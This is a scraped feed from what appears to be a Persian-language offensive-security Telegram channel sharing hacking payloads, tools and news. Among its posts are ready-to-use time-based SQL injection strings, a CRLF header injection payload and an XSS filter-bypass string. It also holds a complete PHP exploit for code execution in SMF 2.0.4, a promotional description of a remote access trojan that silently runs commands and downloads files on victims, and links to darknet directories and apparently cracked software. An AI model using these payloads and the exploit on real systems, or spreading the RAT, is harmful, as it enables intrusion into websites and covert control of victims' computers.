MITRE Caldera - Automated Adversary Emulation Platform
Github
#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥6🆒1
SQL Injection
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
GET
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1
#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7
This media is not supported in your browser
VIEW IN TELEGRAM
Fuzzing and Bypassing the AWS WAF
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
Read Here
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3⚡2🔥1
tor.taxi - your ride to the darknet
.onion Link
#Darkweb #Tor
——————
0Day.Today
@LearnExploit
@Tech_Army
.onion Link
#Darkweb #Tor
——————
0Day.Today
@LearnExploit
@Tech_Army
❤1✍1
OriON - OriON is a virtual machine in Spanish that incorporates several tools for Open Source Intelligence (OSINT) on people
Github
#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2❤1
CRLF Injection Payload
payload :
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload :
%0D%0ASomeCustomInjectedHeader:%20injected_by_fffffff
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1
خالی از لطف نیست دیدنش :
https://youtu.be/GBeEWje0VOI?si=21348IjixXjgryXT
https://youtu.be/GBeEWje0VOI?si=21348IjixXjgryXT
YouTube
ناتکوین، یه گپ با محوریت بازی و اقتصاد
آپدیت ۱۶ می:
نات کوین از طریق ان اف تی و بعد عرضه به پول تبدیل شده و متوسط دوستانی که توش فعال بودن حدود ۲۰۰ تا ۷۰۰ دلار به دست آوردن. متاسفم اگر به خاطر صحبت من به پول نرسیدین ولی دوست داشتین برسین.
۱. منم گفته بودم که اگر آدم ها زیاد بشن، ممکنه سرمایهگذاری…
نات کوین از طریق ان اف تی و بعد عرضه به پول تبدیل شده و متوسط دوستانی که توش فعال بودن حدود ۲۰۰ تا ۷۰۰ دلار به دست آوردن. متاسفم اگر به خاطر صحبت من به پول نرسیدین ولی دوست داشتین برسین.
۱. منم گفته بودم که اگر آدم ها زیاد بشن، ممکنه سرمایهگذاری…
👍7
little payload to bypass filters (in the proper context)
#Payload #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
/*${/*/;{/**/(alert)(1)}//>
#Payload #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3👍2❤1⚡1
👍2
Sql Injection Payload
Payload :
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6👍1
مدیر وبسایت Breachedforum که محل خرید و فروش دیتابیس ها بود به 15 سال زندان در آمریکا محکوم شد!
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
😢16👍2❤1
LearnExploit
#VMware #Remote #Code
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6❤3👍1🔥1
SMF 2.0.4 admin payload code execution
⚪️ proof of concept that latest SMF (2.0.4) can be
exploited by php injection.
⚪️ payload code must escape from \', so you should try with something like that:
⚪️ p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
⚪️ For character_set - another story, as far as I remember, because here we have
⚪️ a nice stored xss. ;)
⚪️ to successfully exploit smf 2.0.4 we need correct admin's cookie:
Code:
#Execution #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
exploited by php injection.
Code:
<?php
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>
#Execution #XSS #Payload
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9⚡3👍2👨💻1
Mantis is a command-line framework designed to automate the workflow of asset discovery, reconnaissance, and scanning. It takes the top-level domains as input, then seamlessly progresses to discovering corresponding assets, including subdomains and certificates. The tool performs reconnaissance on active assets and concludes with a comprehensive scan for vulnerabilities, secrets, misconfigurations and phishing domains - all powered by a blend of open-source and custom tools.
cd mantis/setup/docker
./docker-setup-macos.sh
./docker-setup-ubuntu.sh
LearnExploit
#Automates #Discovery #Vulnerability #Scanning
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤2👍1
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:
zombie.exe 127.0.0.1 27015
BugCod3
#Rat #Malware #Remote #Access
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11⚡5❤4
311138
#Burpsuite #Pro #Tools
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍3👎2
Udemy - Cisco CCNA Course With LABS
Download ( 42g )
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
Download ( 42g )
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥6